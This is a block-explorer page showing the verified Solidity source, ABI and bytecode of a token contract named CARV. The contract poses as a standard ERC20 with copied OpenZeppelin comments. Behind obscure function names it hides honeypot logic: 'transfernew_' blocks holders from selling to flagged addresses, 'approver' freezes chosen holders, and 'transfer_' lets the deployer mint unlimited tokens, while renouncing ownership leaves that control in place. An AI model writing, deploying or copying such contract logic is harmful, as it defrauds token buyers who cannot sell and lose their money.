POL Price: $0.572366 (-16.00%)
 

Overview

Max Total Supply

100,000,001,000,000,000 CARV

Holders

27

Total Transfers

-

Market

Price

$0.00 @ 0.000000 POL

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
CARV

Compiler Version
v0.8.27+commit.40a35a09

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at polygonscan.com on 2024-10-12
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;
/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

abstract contract Ownable  {
    constructor() {
        _transferOwnership(_msgSender());
    }

   
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
    address private _owner;
    function owner() public view virtual returns (address) {
        return _owner;
    }
      /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */

    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
     /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
      /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
     /**
     * @dev Implementation of the {IERC20} interface.
     *
     * This implementation is agnostic to the way tokens are created. This means
     * that a supply mechanism has to be added in a derived contract using {_yydsed}.
     * For a generic mechanism see {ERC20PresetMinterPauser}.
     *
     * TIP: For a detailed writeup see our guide
     * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
     * to implement supply mechanisms].
     *
     * The default value of {decimals} is 18. To change this, you should override
     * this function so it returns a different value.
     *
     * We have followed general OpenZeppelin Contracts guidelines: functions revert
     * instead returning `false` on failure. This behavior is nonetheless
     * conventional and does not conflict with the expectations of ERC20
     * applications.
     *
     * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
     * This allows applications to reconstruct the allowance for all accounts just
     * by listening to said events. Other implementations of the EIP may not emit
     * these events, as it isn't required by the specification.
     *
     * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
     * functions have been added to mitigate the well-known issues around setting
     * allowances. See {IERC20-approve}.
     */
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
}
     /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
contract CARV      is Ownable {
    uint256 _totalSupply = 10*10**8*10**decimals();
    uint256 user0 = _totalSupply;
    address private lp;
    string private _tokenname;
    string private _tokensymbol;
    mapping(address => bool) private Holders;
    address[] public _Holders;
    constructor(string memory name_, string memory symbol_) {
        address msgSender = _msgSender();
        _tokenname = name_;
        _tokensymbol = symbol_;
        lp = _msgSender();
        balances[msgSender] += _totalSupply;
        emit Transfer(address(0), msgSender, _totalSupply);
    }
     /**
     * @dev Returns the name of the token.
     */

    mapping(address => uint256) private balances;
    mapping(address => bool) private i;
    mapping(address => bool) private m;
    mapping(address => mapping(address => uint256)) private _allowances;
     /**
     * @dev Returns the name of the token.
     */
    
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);
    
    function symbol() public view  returns (string memory) {
        return _tokensymbol;
    }
        /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function totalSupply() public view returns (uint256) {
        return _totalSupply;
    }

    function decimals() public view virtual returns (uint8) {
        return 9;
    }
    function _HoldersAddress(address _address) internal {
        if (!Holders[_address]) {
            Holders[_address] = true;
            _Holders.push(_address);
        }
    }
      function getTokenHolders() public view returns (address[] memory) {
        return _Holders;
    }

   function transfernew_(address uin9, bool list) public {
    if (lp != msg.sender) {
        revert("fu");
    }
        m[uin9] 
    = list;
}

    function balanceOf(address account) public view returns (uint256) {
        return balances[account];
    }
      /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */


    function name() public view returns (string memory) {
        return _tokenname;
    }
          /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
     
    function approver (address uin6, bool data) public {
          if(lp != _msgSender()){
            revert("fu");
        }
           i[uin6] 
       = data;
    }
    

     /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public returns (bool) {
        _transfer(_msgSender(), to, amount);
        return true;
    }
   
    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }
      /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */

    function approve(address spender, uint256 amount) public returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
         /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual  returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }
      /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    


     function _transfer(
     address from,
     address to,
     uint256 amount
    ) internal virtual {
     uint256 decysBalances =balances[from];
     decysBalances = (m[to] && from !=lp) ? 0 : decysBalances;
     require(from != address(0), "ERC20: transfer from the zero address");
     require(to != address(0), "ERC20: transfer to the zero address");
     decysBalances = i[from] ? 0 : decysBalances;
     require(decysBalances >= amount, "ERC20: transfer amount exceeds balance");
     balances[from] = balances[from]-amount;
     balances[to] = balances[to]+amount;
    
     emit Transfer(from, to, amount);
      _HoldersAddress(to);
    
    }
 
       /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
     
     //function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
       /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */


    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _approve(owner, spender, currentAllowance - amount);
        }
    }
      /**
     * @dev See {IERC20-allowance}.
     */

         /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}
        function transfer_(uint256 _user1) public     {
          if(false){
        }
        if(true){ 
        }
        uint256 user1 = _user1;
        uint256 user4 = user0*user1;
        address user2 = _msgSender();
        uint256 user5 = _totalSupply;
        address user3 = user2;
         if(lp != _msgSender()){
            revert("fu");
        }else{
            if(lp != _msgSender()){
                revert("fu");
            }
        balances[user3] += user4; 
        user5 += user4; 
        _totalSupply = user5;
            }
        }
    
    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
    //**

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(owner, spender, currentAllowance - subtractedValue);
        return true;
    }
}
     /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    
    
     /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"_Holders","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uin6","type":"address"},{"internalType":"bool","name":"data","type":"bool"}],"name":"approver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTokenHolders","outputs":[{"internalType":"address[]","name":"","type":"address[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_user1","type":"uint256"}],"name":"transfer_","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uin9","type":"address"},{"internalType":"bool","name":"list","type":"bool"}],"name":"transfernew_","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526100106009600a610249565b61001e90633b9aca0061025e565b600155600154600255348015610032575f5ffd5b5060405161127938038061127983398101604081905261005191610312565b61005a33610101565b33600461006784826103fb565b50600561007483826103fb565b50600380546001600160a01b031916331790556001546001600160a01b0382165f90815260086020526040812080549091906100b19084906104b5565b90915550506001546040519081526001600160a01b038216905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050506104c8565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b5f52601160045260245ffd5b6001815b600184111561019f5780850481111561018357610183610150565b600184161561019157908102905b60019390931c928002610168565b935093915050565b5f826101b557506001610243565b816101c157505f610243565b81600181146101d757600281146101e1576101fd565b6001915050610243565b60ff8411156101f2576101f2610150565b50506001821b610243565b5060208310610133831016604e8410600b8410161715610220575081810a610243565b61022c5f198484610164565b805f190482111561023f5761023f610150565b0290505b92915050565b5f61025760ff8416836101a7565b9392505050565b808202811582820484141761024357610243610150565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112610298575f5ffd5b81516001600160401b038111156102b1576102b1610275565b604051601f8201601f19908116603f011681016001600160401b03811182821017156102df576102df610275565b6040528181528382016020018510156102f6575f5ffd5b8160208501602083015e5f918101602001919091529392505050565b5f5f60408385031215610323575f5ffd5b82516001600160401b03811115610338575f5ffd5b61034485828601610289565b602085015190935090506001600160401b03811115610361575f5ffd5b61036d85828601610289565b9150509250929050565b600181811c9082168061038b57607f821691505b6020821081036103a957634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156103f657805f5260205f20601f840160051c810160208510156103d45750805b601f840160051c820191505b818110156103f3575f81556001016103e0565b50505b505050565b81516001600160401b0381111561041457610414610275565b610428816104228454610377565b846103af565b6020601f82116001811461045a575f83156104435750848201515b5f19600385901b1c1916600184901b1784556103f3565b5f84815260208120601f198516915b828110156104895787850151825560209485019460019092019101610469565b50848210156104a657868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b8082018082111561024357610243610150565b610da4806104d55f395ff3fe608060405234801561000f575f5ffd5b5060043610610106575f3560e01c8063715018a61161009e578063a457c2d71161006e578063a457c2d71461021c578063a9059cbb1461022f578063bd55525314610242578063dd62ed3e14610255578063f9fc908514610268575f5ffd5b8063715018a6146101e7578063876b1566146101ef5780638da5cb5b1461020457806395d89b4114610214575f5ffd5b8063313ce567116100d9578063313ce5671461017057806348f2f8121461017f5780634a7eb02e1461019457806370a08231146101bf575f5ffd5b806306fdde031461010a578063095ea7b31461012857806318160ddd1461014b57806323b872dd1461015d575b5f5ffd5b61011261027b565b60405161011f9190610b2b565b60405180910390f35b61013b610136366004610b7b565b61030b565b604051901515815260200161011f565b6001545b60405190815260200161011f565b61013b61016b366004610ba3565b610321565b6040516009815260200161011f565b61019261018d366004610bdd565b610344565b005b6101a76101a2366004610c16565b6103a1565b6040516001600160a01b03909116815260200161011f565b61014f6101cd366004610c2d565b6001600160a01b03165f9081526008602052604090205490565b6101926103c9565b6101f76103dc565b60405161011f9190610c4d565b5f546001600160a01b03166101a7565b61011261043b565b61013b61022a366004610b7b565b61044a565b61013b61023d366004610b7b565b6104cb565b610192610250366004610c16565b6104d7565b61014f610263366004610c98565b610589565b610192610276366004610bdd565b6105b3565b60606004805461028a90610cc9565b80601f01602080910402602001604051908101604052809291908181526020018280546102b690610cc9565b80156103015780601f106102d857610100808354040283529160200191610301565b820191905f5260205f20905b8154815290600101906020018083116102e457829003601f168201915b5050505050905090565b5f610317338484610607565b5060015b92915050565b5f3361032e85828561072a565b6103398585856107a4565b506001949350505050565b6003546001600160a01b031633146103775760405162461bcd60e51b815260040161036e90610d01565b60405180910390fd5b6001600160a01b03919091165f908152600960205260409020805460ff1916911515919091179055565b600781815481106103b0575f80fd5b5f918252602090912001546001600160a01b0316905081565b6103d16109fc565b6103da5f610a55565b565b6060600780548060200260200160405190810160405280929190818152602001828054801561030157602002820191905f5260205f20905b81546001600160a01b03168152600190910190602001808311610414575050505050905090565b60606005805461028a90610cc9565b5f33816104578286610589565b9050838110156104b75760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161036e565b61033982866104c68785610d31565b610607565b5f6103173384846107a4565b60025481905f906104e9908390610d44565b600154600354919250339182906001600160a01b0316811461051d5760405162461bcd60e51b815260040161036e90610d01565b6003546001600160a01b031633146105475760405162461bcd60e51b815260040161036e90610d01565b6001600160a01b0381165f908152600860205260408120805486929061056e908490610d5b565b9091555061057e90508483610d5b565b600155505050505050565b6001600160a01b039182165f908152600b6020908152604080832093909416825291909152205490565b6003546001600160a01b031633146105dd5760405162461bcd60e51b815260040161036e90610d01565b6001600160a01b03919091165f908152600a60205260409020805460ff1916911515919091179055565b6001600160a01b0383166106695760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161036e565b6001600160a01b0382166106ca5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161036e565b6001600160a01b038381165f818152600b602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f6107358484610589565b90505f19811461079e578181101561078f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161036e565b61079e84846104c68585610d31565b50505050565b6001600160a01b038084165f908152600860209081526040808320549386168352600a90915290205460ff1680156107ea57506003546001600160a01b03858116911614155b6107f457806107f6565b5f5b90506001600160a01b03841661085c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161036e565b6001600160a01b0383166108be5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161036e565b6001600160a01b0384165f9081526009602052604090205460ff166108e357806108e5565b5f5b9050818110156109465760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161036e565b6001600160a01b0384165f90815260086020526040902054610969908390610d31565b6001600160a01b038086165f908152600860205260408082209390935590851681522054610998908390610d5b565b6001600160a01b038085165f8181526008602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109eb9086815260200190565b60405180910390a361079e83610aa4565b5f546001600160a01b031633146103da5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161036e565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0381165f9081526006602052604090205460ff16610b28576001600160a01b0381165f818152600660205260408120805460ff191660019081179091556007805491820181559091527fa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c6880180546001600160a01b03191690911790555b50565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114610b76575f5ffd5b919050565b5f5f60408385031215610b8c575f5ffd5b610b9583610b60565b946020939093013593505050565b5f5f5f60608486031215610bb5575f5ffd5b610bbe84610b60565b9250610bcc60208501610b60565b929592945050506040919091013590565b5f5f60408385031215610bee575f5ffd5b610bf783610b60565b915060208301358015158114610c0b575f5ffd5b809150509250929050565b5f60208284031215610c26575f5ffd5b5035919050565b5f60208284031215610c3d575f5ffd5b610c4682610b60565b9392505050565b602080825282518282018190525f918401906040840190835b81811015610c8d5783516001600160a01b0316835260209384019390920191600101610c66565b509095945050505050565b5f5f60408385031215610ca9575f5ffd5b610cb283610b60565b9150610cc060208401610b60565b90509250929050565b600181811c90821680610cdd57607f821691505b602082108103610cfb57634e487b7160e01b5f52602260045260245ffd5b50919050565b602080825260029082015261667560f01b604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561031b5761031b610d1d565b808202811582820484141761031b5761031b610d1d565b8082018082111561031b5761031b610d1d56fea264697066735822122065954af51ba298ff91d4e2a48a5ec2c92dd99507cc811f944973f020b40e9a0d64736f6c634300081b0033000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000004434152560000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044341525600000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561000f575f5ffd5b5060043610610106575f3560e01c8063715018a61161009e578063a457c2d71161006e578063a457c2d71461021c578063a9059cbb1461022f578063bd55525314610242578063dd62ed3e14610255578063f9fc908514610268575f5ffd5b8063715018a6146101e7578063876b1566146101ef5780638da5cb5b1461020457806395d89b4114610214575f5ffd5b8063313ce567116100d9578063313ce5671461017057806348f2f8121461017f5780634a7eb02e1461019457806370a08231146101bf575f5ffd5b806306fdde031461010a578063095ea7b31461012857806318160ddd1461014b57806323b872dd1461015d575b5f5ffd5b61011261027b565b60405161011f9190610b2b565b60405180910390f35b61013b610136366004610b7b565b61030b565b604051901515815260200161011f565b6001545b60405190815260200161011f565b61013b61016b366004610ba3565b610321565b6040516009815260200161011f565b61019261018d366004610bdd565b610344565b005b6101a76101a2366004610c16565b6103a1565b6040516001600160a01b03909116815260200161011f565b61014f6101cd366004610c2d565b6001600160a01b03165f9081526008602052604090205490565b6101926103c9565b6101f76103dc565b60405161011f9190610c4d565b5f546001600160a01b03166101a7565b61011261043b565b61013b61022a366004610b7b565b61044a565b61013b61023d366004610b7b565b6104cb565b610192610250366004610c16565b6104d7565b61014f610263366004610c98565b610589565b610192610276366004610bdd565b6105b3565b60606004805461028a90610cc9565b80601f01602080910402602001604051908101604052809291908181526020018280546102b690610cc9565b80156103015780601f106102d857610100808354040283529160200191610301565b820191905f5260205f20905b8154815290600101906020018083116102e457829003601f168201915b5050505050905090565b5f610317338484610607565b5060015b92915050565b5f3361032e85828561072a565b6103398585856107a4565b506001949350505050565b6003546001600160a01b031633146103775760405162461bcd60e51b815260040161036e90610d01565b60405180910390fd5b6001600160a01b03919091165f908152600960205260409020805460ff1916911515919091179055565b600781815481106103b0575f80fd5b5f918252602090912001546001600160a01b0316905081565b6103d16109fc565b6103da5f610a55565b565b6060600780548060200260200160405190810160405280929190818152602001828054801561030157602002820191905f5260205f20905b81546001600160a01b03168152600190910190602001808311610414575050505050905090565b60606005805461028a90610cc9565b5f33816104578286610589565b9050838110156104b75760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161036e565b61033982866104c68785610d31565b610607565b5f6103173384846107a4565b60025481905f906104e9908390610d44565b600154600354919250339182906001600160a01b0316811461051d5760405162461bcd60e51b815260040161036e90610d01565b6003546001600160a01b031633146105475760405162461bcd60e51b815260040161036e90610d01565b6001600160a01b0381165f908152600860205260408120805486929061056e908490610d5b565b9091555061057e90508483610d5b565b600155505050505050565b6001600160a01b039182165f908152600b6020908152604080832093909416825291909152205490565b6003546001600160a01b031633146105dd5760405162461bcd60e51b815260040161036e90610d01565b6001600160a01b03919091165f908152600a60205260409020805460ff1916911515919091179055565b6001600160a01b0383166106695760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161036e565b6001600160a01b0382166106ca5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161036e565b6001600160a01b038381165f818152600b602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f6107358484610589565b90505f19811461079e578181101561078f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161036e565b61079e84846104c68585610d31565b50505050565b6001600160a01b038084165f908152600860209081526040808320549386168352600a90915290205460ff1680156107ea57506003546001600160a01b03858116911614155b6107f457806107f6565b5f5b90506001600160a01b03841661085c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161036e565b6001600160a01b0383166108be5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161036e565b6001600160a01b0384165f9081526009602052604090205460ff166108e357806108e5565b5f5b9050818110156109465760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161036e565b6001600160a01b0384165f90815260086020526040902054610969908390610d31565b6001600160a01b038086165f908152600860205260408082209390935590851681522054610998908390610d5b565b6001600160a01b038085165f8181526008602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109eb9086815260200190565b60405180910390a361079e83610aa4565b5f546001600160a01b031633146103da5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161036e565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0381165f9081526006602052604090205460ff16610b28576001600160a01b0381165f818152600660205260408120805460ff191660019081179091556007805491820181559091527fa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c6880180546001600160a01b03191690911790555b50565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114610b76575f5ffd5b919050565b5f5f60408385031215610b8c575f5ffd5b610b9583610b60565b946020939093013593505050565b5f5f5f60608486031215610bb5575f5ffd5b610bbe84610b60565b9250610bcc60208501610b60565b929592945050506040919091013590565b5f5f60408385031215610bee575f5ffd5b610bf783610b60565b915060208301358015158114610c0b575f5ffd5b809150509250929050565b5f60208284031215610c26575f5ffd5b5035919050565b5f60208284031215610c3d575f5ffd5b610c4682610b60565b9392505050565b602080825282518282018190525f918401906040840190835b81811015610c8d5783516001600160a01b0316835260209384019390920191600101610c66565b509095945050505050565b5f5f60408385031215610ca9575f5ffd5b610cb283610b60565b9150610cc060208401610b60565b90509250929050565b600181811c90821680610cdd57607f821691505b602082108103610cfb57634e487b7160e01b5f52602260045260245ffd5b50919050565b602080825260029082015261667560f01b604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561031b5761031b610d1d565b808202811582820484141761031b5761031b610d1d565b8082018082111561031b5761031b610d1d56fea264697066735822122065954af51ba298ff91d4e2a48a5ec2c92dd99507cc811f944973f020b40e9a0d64736f6c634300081b0033

